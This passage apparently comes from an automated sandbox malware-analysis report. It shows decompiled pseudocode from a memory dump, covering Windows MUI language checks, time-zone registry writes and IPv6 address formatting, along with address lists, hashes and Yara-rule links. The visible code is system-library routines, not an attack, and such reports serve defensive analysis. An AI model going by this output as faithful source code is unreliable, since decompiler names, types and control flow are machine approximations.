						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0094E2A8(_v12,  &_v68, _v16);
							if(E00965553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0095E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0094E2A8(_t322,  &_v68, _t269);
							if(E00965553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0096718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0094E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00942340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0095E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0094E2A8(_v12,  &_v68, _v16);
						if(E00965553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0095E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0094E2A8(_t322,  &_v68, _t296);
						if(E00965553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0094E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                              0x00968788
                                                                                                                                                              0x00968788
                                                                                                                                                              0x00968791
                                                                                                                                                              0x00968794
                                                                                                                                                              0x00968798
                                                                                                                                                              0x0096879b
                                                                                                                                                              0x0096879e
                                                                                                                                                              0x009687a1
                                                                                                                                                              0x009687a4
                                                                                                                                                              0x009687a7
                                                                                                                                                              0x009687aa
                                                                                                                                                              0x009687af
                                                                                                                                                              0x009b1ad3
                                                                                                                                                              0x00968b0a
                                                                                                                                                              0x00968b0d
                                                                                                                                                              0x00968b13
                                                                                                                                                              0x00968b19
                                                                                                                                                              0x00968b1f
                                                                                                                                                              0x00968b25
                                                                                                                                                              0x00968b2b
                                                                                                                                                              0x00968b31
                                                                                                                                                              0x00968b37
                                                                                                                                                              0x00968b3d
                                                                                                                                                              0x00968b46
                                                                                                                                                              0x00968b46
                                                                                                                                                              0x009687c6
                                                                                                                                                              0x009687d0
                                                                                                                                                              0x009b1ae0
                                                                                                                                                              0x009b1ae6
                                                                                                                                                              0x009b1af8
                                                                                                                                                              0x009b1af8
                                                                                                                                                              0x009b1afd
                                                                                                                                                              0x009b1afe
                                                                                                                                                              0x009b1b01
                                                                                                                                                              0x009b1b06
                                                                                                                                                              0x009b1b06
                                                                                                                                                              0x009687d6
                                                                                                                                                              0x009687f2
                                                                                                                                                              0x009687f7
                                                                                                                                                              0x00968807
                                                                                                                                                              0x0096880a
                                                                                                                                                              0x0096880f
                                                                                                                                                              0x00968810
                                                                                                                                                              0x00968813
                                                                                                                                                              0x00968818
                                                                                                                                                              0x00968818
                                                                                                                                                              0x0096882c
                                                                                                                                                              0x00968831
                                                                                                                                                              0x00968838
                                                                                                                                                              0x00968908
                                                                                                                                                              0x00968920
                                                                                                                                                              0x009689f0
                                                                                                                                                              0x00968a08
                                                                                                                                                              0x00968af6
                                                                                                                                                              0x00968af6
                                                                                                                                                              0x00968af8
                                                                                                                                                              0x00968afb
                                                                                                                                                              0x009b1beb
                                                                                                                                                              0x009b1beb
                                                                                                                                                              0x00968b04
                                                                                                                                                              0x009b1bf8
                                                                                                                                                              0x009b1c0e
                                                                                                                                                              0x009b1c13
                                                                                                                                                              0x009b1c16
                                                                                                                                                              0x009b1c16
                                                                                                                                                              0x009b1bf8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00968b04
                                                                                                                                                              0x00968a0e
                                                                                                                                                              0x00968a11
                                                                                                                                                              0x00968a14
                                                                                                                                                              0x00968a15
                                                                                                                                                              0x00968a18
                                                                                                                                                              0x00968a22
                                                                                                                                                              0x00968b59
                                                                                                                                                              0x00968a28
                                                                                                                                                              0x00968a3c
                                                                                                                                                              0x00968a3c
                                                                                                                                                              0x00968a42
                                                                                                                                                              0x009b1bb0
                                                                                                                                                              0x009b1b11
                                                                                                                                                              0x009b1b11
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00968a48
                                                                                                                                                              0x00968a51
                                                                                                                                                              0x00968a5b
                                                                                                                                                              0x00968a5e
                                                                                                                                                              0x00968a61
                                                                                                                                                              0x00968a69
                                                                                                                                                              0x00968a69
                                                                                                                                                              0x00968a6d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00968a74
                                                                                                                                                              0x00968a7c
                                                                                                                                                              0x00968a7d
                                                                                                                                                              0x00968a91
                                                                                                                                                              0x00968a93
                                                                                                                                                              0x00968a93
                                                                                                                                                              0x00968a98
                                                                                                                                                              0x00968a9b
                                                                                                                                                              0x00968aa1
                                                                                                                                                              0x00968aa1
                                                                                                                                                              0x00968aa4
                                                                                                                                                              0x00968aaa
                                                                                                                                                              0x00968ab1
                                                                                                                                                              0x00968ac5
                                                                                                                                                              0x00968ac7
                                                                                                                                                              0x00968ac7
                                                                                                                                                              0x00968ac5
                                                                                                                                                              0x00968ace
                                                                                                                                                              0x009b1bc9
                                                                                                                                                              0x009b1bce
                                                                                                                                                              0x009b1bd2
                                                                                                                                                              0x009b1bd2
                                                                                                                                                              0x00968ad8
                                                                                                                                                              0x00968aeb
                                                                                                                                                              0x00968aeb
                                                                                                                                                              0x00968af0
                                                                                                                                                              0x00968af4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00968af4
                                                                                                                                                              0x00968a42
                                                                                                                                                              0x00968926
                                                                                                                                                              0x00968929
                                                                                                                                                              0x0096892c
                                                                                                                                                              0x0096892d
                                                                                                                                                              0x00968930
                                                                                                                                                              0x00968935
                                                                                                                                                              0x0096893a
                                                                                                                                                              0x00968b51
                                                                                                                                                              0x00968940
                                                                                                                                                              0x00968954
                                                                                                                                                              0x00968954
                                                                                                                                                              0x0096895a
                                                                                                                                                              0x009b1b63
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00968960
                                                                                                                                                              0x00968969
                                                                                                                                                              0x00968973
                                                                                                                                                              0x00968976
                                                                                                                                                              0x00968979
                                                                                                                                                              0x0096897e
                                                                                                                                                              0x00968981
                                                                                                                                                              0x00968981
                                                                                                                                                              0x00968986
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009b1b6e
                                                                                                                                                              0x009b1b74
                                                                                                                                                              0x009b1b7b
                                                                                                                                                              0x009b1b8f
                                                                                                                                                              0x009b1b91
                                                                                                                                                              0x009b1b91
                                                                                                                                                              0x009b1b99
                                                                                                                                                              0x009b1b9c
                                                                                                                                                              0x009b1ba2
                                                                                                                                                              0x009b1ba2
                                                                                                                                                              0x0096898c
                                                                                                                                                              0x00968992
                                                                                                                                                              0x00968999
                                                                                                                                                              0x009689ad
                                                                                                                                                              0x009b1ba8
                                                                                                                                                              0x009b1ba8
                                                                                                                                                              0x009689ad
                                                                                                                                                              0x009689b6
                                                                                                                                                              0x009689c8
                                                                                                                                                              0x009689cd
                                                                                                                                                              0x009689d0
                                                                                                                                                              0x009689d0
                                                                                                                                                              0x009689d6
                                                                                                                                                              0x009689e8
                                                                                                                                                              0x009689e8
                                                                                                                                                              0x009689ed
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009689ed
                                                                                                                                                              0x0096895a
                                                                                                                                                              0x0096883e
                                                                                                                                                              0x00968841
                                                                                                                                                              0x00968844
                                                                                                                                                              0x00968845
                                                                                                                                                              0x00968848
                                                                                                                                                              0x0096884d
                                                                                                                                                              0x00968852
                                                                                                                                                              0x00968b49
                                                                                                                                                              0x00968858
                                                                                                                                                              0x0096886c
                                                                                                                                                              0x0096886c
                                                                                                                                                              0x00968872
                                                                                                                                                              0x009b1b0e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00968878
                                                                                                                                                              0x00968881
                                                                                                                                                              0x0096888b
                                                                                                                                                              0x0096888e
                                                                                                                                                              0x00968891
                                                                                                                                                              0x00968896
                                                                                                                                                              0x00968899
                                                                                                                                                              0x00968899
                                                                                                                                                              0x0096889e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009b1b21
                                                                                                                                                              0x009b1b27
                                                                                                                                                              0x009b1b2e
                                                                                                                                                              0x009b1b42
                                                                                                                                                              0x009b1b44
                                                                                                                                                              0x009b1b44
                                                                                                                                                              0x009b1b4c
                                                                                                                                                              0x009b1b4f
                                                                                                                                                              0x009b1b55
                                                                                                                                                              0x009b1b55
                                                                                                                                                              0x009688a4
                                                                                                                                                              0x009688aa
                                                                                                                                                              0x009688b1
                                                                                                                                                              0x009688c5
                                                                                                                                                              0x009b1b5b
                                                                                                                                                              0x009b1b5b
                                                                                                                                                              0x009688c5
                                                                                                                                                              0x009688ce
                                                                                                                                                              0x009688e0
                                                                                                                                                              0x009688e5
                                                                                                                                                              0x009688e8
                                                                                                                                                              0x009688e8
                                                                                                                                                              0x009688ee
                                                                                                                                                              0x00968900
                                                                                                                                                              0x00968900
                                                                                                                                                              0x00968905
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00968905

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 009689FC
                                                                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00968914
                                                                                                                                                              • WindowsExcludedProcs, xrefs: 009687C1
                                                                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 00968827
                                                                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 009687E6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcspbrk
                                                                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                              • API String ID: 402402107-258546922
                                                                                                                                                              • Opcode ID: 42d6b28ed2d42e7911f76f528d8e63777181eb8efa33692cb41f1e9498121ec9
                                                                                                                                                              • Instruction ID: 6ffa5241163be458eeecb8fce4fc9da3c752071e4ca8b5ee2ddfd3ed3224f487
                                                                                                                                                              • Opcode Fuzzy Hash: 42d6b28ed2d42e7911f76f528d8e63777181eb8efa33692cb41f1e9498121ec9
                                                                                                                                                              • Instruction Fuzzy Hash: 04F1F4B2D00209EFCF11EFA5C981EEEBBB8FF48300F14456AE515A7211EB359A45DB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009D822C, Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                              			E009D822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v8;
				void* __ebx;
				signed int _t41;
				void* _t42;
				signed int* _t50;
				void* _t71;
				void* _t73;
				void* _t78;
				signed int _t81;
				void* _t84;

				_push(__ecx);
				_t81 = _a4;
				_t84 = 0x20;
				_t71 = E009F5A34(_t81 + 4, _t84);
				if(_t71 < _t84) {
					_t41 = E009F5A34(_t81 + 0x58, _t84);
					_pop(_t78);
					_a4 = _t41;
					__eflags = _t41 - _t84;
					if(_t41 >= _t84) {
						goto L1;
					} else {
						_t42 = E00997DCD(1,  &_v8);
						__eflags = _t42;
						if(__eflags >= 0) {
							__eflags = E009D810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
							if(__eflags < 0) {
								L14:
								_a4 = 0;
								_t73 = E009D810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
								__eflags = _t73;
								if(__eflags >= 0) {
									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
									_t50 =  &_a8;
									goto L16;
								}
							} else {
								_t8 = _t71 + 2; // 0x2
								__eflags = E009D810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
								if(__eflags < 0) {
									goto L14;
								} else {
									_t71 = 4;
									__eflags = E009D810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
									if(__eflags < 0) {
										goto L14;
									} else {
										__eflags = E009D810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
										if(__eflags < 0) {
											goto L14;
										} else {
											__eflags = E009D810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
											if(__eflags < 0) {
												goto L14;
											} else {
												__eflags = E009D810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
												if(__eflags < 0) {
													goto L14;
												} else {
													__eflags = E009D810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
													if(__eflags < 0) {
														goto L14;
													} else {
														__eflags = _a8 - 0x1b0;
														if(__eflags < 0) {
															goto L14;
														} else {
															_t73 = E009D810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
															__eflags = _t73;
															if(__eflags >= 0) {
																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
																_t50 =  &_a4;
																L16:
																_t73 = E009D810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
															}
														}
													}
												}
											}
										}
									}
								}
							}
							E0093F9F0(_v8);
							_t42 = _t73;
						}
					}
				} else {
					L1:
					_t42 = 0xc000000d;
				}
				return _t42;
			}













                                                                                                                                                              0x009d8231
                                                                                                                                                              0x009d8235
                                                                                                                                                              0x009d823a
                                                                                                                                                              0x009d8245
                                                                                                                                                              0x009d824b
                                                                                                                                                              0x009d825c
                                                                                                                                                              0x009d8262
                                                                                                                                                              0x009d8263
                                                                                                                                                              0x009d8266
                                                                                                                                                              0x009d8268
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009d826a
                                                                                                                                                              0x009d8270
                                                                                                                                                              0x009d8275
                                                                                                                                                              0x009d8277
                                                                                                                                                              0x009d8295
                                                                                                                                                              0x009d8297
                                                                                                                                                              0x009d838d
                                                                                                                                                              0x009d8391
                                                                                                                                                              0x009d83a9
                                                                                                                                                              0x009d83ab
                                                                                                                                                              0x009d83ad
                                                                                                                                                              0x009d83b6
                                                                                                                                                              0x009d83b9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009d83b9
                                                                                                                                                              0x009d829d
                                                                                                                                                              0x009d829d
                                                                                                                                                              0x009d82b6
                                                                                                                                                              0x009d82b8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009d82be
                                                                                                                                                              0x009d82c0
                                                                                                                                                              0x009d82d5
                                                                                                                                                              0x009d82d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009d82dd
                                                                                                                                                              0x009d82f3
                                                                                                                                                              0x009d82f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009d82fb
                                                                                                                                                              0x009d8317
                                                                                                                                                              0x009d8319
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009d831b
                                                                                                                                                              0x009d8332
                                                                                                                                                              0x009d8334
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009d8336
                                                                                                                                                              0x009d834f
                                                                                                                                                              0x009d8351
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009d8353
                                                                                                                                                              0x009d8353
                                                                                                                                                              0x009d835a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009d835c
                                                                                                                                                              0x009d8378
                                                                                                                                                              0x009d837a
                                                                                                                                                              0x009d837c
                                                                                                                                                              0x009d8385
                                                                                                                                                              0x009d8388
                                                                                                                                                              0x009d83bc
                                                                                                                                                              0x009d83cf
                                                                                                                                                              0x009d83cf
                                                                                                                                                              0x009d837c
                                                                                                                                                              0x009d835a
                                                                                                                                                              0x009d8351
                                                                                                                                                              0x009d8334
                                                                                                                                                              0x009d8319
                                                                                                                                                              0x009d82f5
                                                                                                                                                              0x009d82d7
                                                                                                                                                              0x009d82b8
                                                                                                                                                              0x009d83d4
                                                                                                                                                              0x009d83d9
                                                                                                                                                              0x009d83d9
                                                                                                                                                              0x009d8277
                                                                                                                                                              0x009d824d
                                                                                                                                                              0x009d824d
                                                                                                                                                              0x009d824d
                                                                                                                                                              0x009d824d
                                                                                                                                                              0x009d83df

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsnlen
                                                                                                                                                              • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                                                                                              • API String ID: 3628947076-1387797911
                                                                                                                                                              • Opcode ID: e90cd48ead588d1cfd86a2d68562bc1d62515c9d9515c5686a427c7cd701d2c4
                                                                                                                                                              • Instruction ID: 1c0086e8b9322ccd59f0f42b02f55903785cdf39b55e0b4743af7af3da8b6022
                                                                                                                                                              • Opcode Fuzzy Hash: e90cd48ead588d1cfd86a2d68562bc1d62515c9d9515c5686a427c7cd701d2c4
                                                                                                                                                              • Instruction Fuzzy Hash: 6241B771298709BAEB019AD0CD42FDFB76CAF44B54F108113BB04D6292DFB0DB558BA4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009813CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 38%
                                                                                                                                                              			E009813CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00977707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x942926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00977707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x949cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00977707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00977707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00977707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00977707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                              0x009813d5
                                                                                                                                                              0x009813d9
                                                                                                                                                              0x009813dc
                                                                                                                                                              0x009813de
                                                                                                                                                              0x009813e1
                                                                                                                                                              0x009813e8
                                                                                                                                                              0x009813ee
                                                                                                                                                              0x009ae8fd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ae921
                                                                                                                                                              0x009ae921
                                                                                                                                                              0x009ae928
                                                                                                                                                              0x009ae982
                                                                                                                                                              0x009ae98a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ae99a
                                                                                                                                                              0x009ae99e
                                                                                                                                                              0x009ae9a3
                                                                                                                                                              0x009ae9a8
                                                                                                                                                              0x009ae9b9
                                                                                                                                                              0x009ae978
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ae978
                                                                                                                                                              0x009ae98a
                                                                                                                                                              0x009ae92a
                                                                                                                                                              0x009ae931
                                                                                                                                                              0x009ae944
                                                                                                                                                              0x009ae944
                                                                                                                                                              0x009ae950
                                                                                                                                                              0x009ae954
                                                                                                                                                              0x009ae959
                                                                                                                                                              0x009ae95e
                                                                                                                                                              0x009ae963
                                                                                                                                                              0x009ae970
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ae975
                                                                                                                                                              0x009ae93b
                                                                                                                                                              0x009ae980
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ae980
                                                                                                                                                              0x009ae942
                                                                                                                                                              0x009ae94b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ae94b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ae942
                                                                                                                                                              0x009813f4
                                                                                                                                                              0x009813f4
                                                                                                                                                              0x009813f9
                                                                                                                                                              0x009813fc
                                                                                                                                                              0x009813ff
                                                                                                                                                              0x00981406
                                                                                                                                                              0x009ae9cc
                                                                                                                                                              0x009ae9d2
                                                                                                                                                              0x009ae9d2
                                                                                                                                                              0x009ae9cc
                                                                                                                                                              0x0098140c
                                                                                                                                                              0x00981411
                                                                                                                                                              0x00981431
                                                                                                                                                              0x0098143a
                                                                                                                                                              0x0098143c
                                                                                                                                                              0x0098143f
                                                                                                                                                              0x0098143f
                                                                                                                                                              0x00981442
                                                                                                                                                              0x00981447
                                                                                                                                                              0x009814a8
                                                                                                                                                              0x009814ac
                                                                                                                                                              0x009ae9e2
                                                                                                                                                              0x009ae9e7
                                                                                                                                                              0x009ae9ec
                                                                                                                                                              0x009aea05
                                                                                                                                                              0x009aea05
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00981449
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00981449
                                                                                                                                                              0x0098144c
                                                                                                                                                              0x00981459
                                                                                                                                                              0x00981462
                                                                                                                                                              0x00981469
                                                                                                                                                              0x0098146a
                                                                                                                                                              0x00981470
                                                                                                                                                              0x00981473
                                                                                                                                                              0x00981476
                                                                                                                                                              0x00981476
                                                                                                                                                              0x00981490
                                                                                                                                                              0x00981495
                                                                                                                                                              0x0098138e
                                                                                                                                                              0x00981390
                                                                                                                                                              0x00981397
                                                                                                                                                              0x00981398
                                                                                                                                                              0x00981399
                                                                                                                                                              0x009813a1
                                                                                                                                                              0x009813a4
                                                                                                                                                              0x009813a4
                                                                                                                                                              0x00981498
                                                                                                                                                              0x0098149c
                                                                                                                                                              0x0098149f
                                                                                                                                                              0x009814a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009814a4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009814a4
                                                                                                                                                              0x00981413
                                                                                                                                                              0x00981415
                                                                                                                                                              0x00981416
                                                                                                                                                              0x00981419
                                                                                                                                                              0x0098141c
                                                                                                                                                              0x00981422
                                                                                                                                                              0x009813b7
                                                                                                                                                              0x009813bc
                                                                                                                                                              0x009813bf
                                                                                                                                                              0x009813bf
                                                                                                                                                              0x009813c2
                                                                                                                                                              0x00981424
                                                                                                                                                              0x00981424
                                                                                                                                                              0x00981424
                                                                                                                                                              0x00981427
                                                                                                                                                              0x0098142b
                                                                                                                                                              0x0098142c
                                                                                                                                                              0x0098142c
                                                                                                                                                              0x0098142c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0098141c
                                                                                                                                                              0x00981411

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
